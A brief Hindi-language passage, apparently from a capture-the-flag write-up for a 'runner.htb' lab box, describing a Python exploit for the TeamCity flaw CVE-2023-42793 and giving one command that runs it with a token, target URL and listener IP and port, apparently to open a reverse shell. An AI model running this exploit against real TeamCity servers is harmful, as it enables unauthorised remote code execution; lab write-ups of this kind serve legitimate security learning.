
TeamCity Linux सर्वर पर दूरस्थ कोड निष्पादन प्राप्त करने के लिए CVE-2023-42793 का Python एक्सप्लॉइट, जो एक पेलोड को URL में एन्कोड करके लक्ष्य पर भेजता है।
आपको पहले एक अलग exploit का उपयोग करके token प्राप्त करना होगा। हालाँकि, निम्नलिखित exploit आपको Linux सर्वर में RCE प्राप्त करने की अनुमति देगा क्योंकि यह payload को URL में encode करके सर्वर पर भेजता है।
python3 ./main -t TEAMCITY_TOKEN -u http://teamcity.runner.htb -p 80 -ni LISTENER_IP -np LISTENER_PORT